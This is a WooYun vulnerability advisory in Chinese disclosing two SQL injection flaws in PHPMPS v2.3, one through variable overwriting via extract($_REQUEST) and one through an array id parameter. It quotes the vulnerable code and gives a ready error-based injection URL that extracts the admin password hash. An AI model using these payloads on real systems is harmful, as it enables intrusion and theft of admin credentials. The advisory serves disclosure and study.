漏洞概要 关注数(15) 关注此漏洞
缺陷编号: WooYun-2013-34617
漏洞标题: phpmps_v2.3最新版两处SQL注入漏洞 
相关厂商: phpmps
漏洞作者: My5t3ry
提交时间: 2013-08-20 18:24
公开时间: 2013-11-18 18:25
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 15
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org
Tags标签: sql注入 变量覆盖
漏洞详情
披露状态:
2013-08-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
PHPMPS对用户提交的参数处理不当,导致多个SQL注入漏洞.
详细说明:
member.php 422 - 455
============================================================================================
case 'exchange':
$units = array('gold'=>'枚', 'money'=>'元', 'credit'=>'分');
$types = array('money'=>'资金', 'gold'=>'信息币', 'credit'=>'积分');
$notes = array('login'=>'登陆积分', 'post_info_credit'=>'发布信息积分' ,'post_comment_credit'=>'发布评论积分' ,'info_refer'=>'一键更新信息' ,'info_top'=>'信息置顶' , 'credit2gold'=>'积分兑换信息币', 'money2gold'=>'资金购买信息币');
extract($_REQUEST);
$page = isset($page) ? intval($page) : 1;
$pagesize = 20;
$sql = '';
if($type) $sql .= " AND type='$type' ";
if($begindate) {
$begintime = strtotime($begindate.' 00:00:00');
$sql .= " AND addtime>=$begintime ";
}
if($enddate) {
$endtime = strtotime($enddate.' 23:59:59');
$sql .= " AND addtime<=$endtime";
}
$r = $db->getOne("SELECT count(*) as number FROM {$table}pay_exchange WHERE username='$_username' $sql");
$pager['search'] = array('act' => 'exchange');
$pager = get_pager('member.php', $pager['search'], $r, $page, $pagesize);
$exchanges = array();
$result = $db->query("SELECT * FROM {$table}pay_exchange WHERE username='$_username' $sql ORDER BY exchangeid DESC LIMIT $pager[start],$pager[size]");
while($r = $db->fetchrow($result)) {
$r['unit'] = $units[$r['type']];
$r['type'] = $types[$r['type']];
$r['note'] = !empty($notes[$r['note']]) ? $notes[$r['note']] : $r['note'];
$r['addtime'] = date('Y-m-d h:i:s', $r['addtime']);
$exchanges[] = $r;
}
$seo['title'] = '交易详情';
include template('member_exchange');
break;
============================================================================================
上面的代码使用了extract($_REQUEST);
导致我们可以覆盖任意变量,通过覆盖变量$table可以构造注入
利用如下:
**.**.**.**/phpmps/member.php?act=check_info_gold&table=phpmps_member%20where%201=1%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28select%20password%20from%20phpmps_admin%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
SQL漏洞2:
============================================================================================
member.php 741 - 746 SQL **.**.**.**/phpmps/member.php?act=delete&id[]=1a
============================================================================================
case 'delete':
$id = is_array($_REQUEST['id']) ? join(',', $_REQUEST['id']) : intval($_REQUEST['id']);
if(empty($id))showmsg('没有选择记录');
$db->query("DELETE FROM {$table}comment WHERE id IN ($id)");
showmsg('删除成功', 'member.php?act=info_comment');
break;
============================================================================================
这里没有考虑$id为数组的情况,当提交数组的时候可以注入。
如: **.**.**.**/phpmps/member.php?act=delete&id[]=1a
漏洞证明:
修复方案:
过滤。。。
版权声明:转载请注明来源 My5t3ry@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值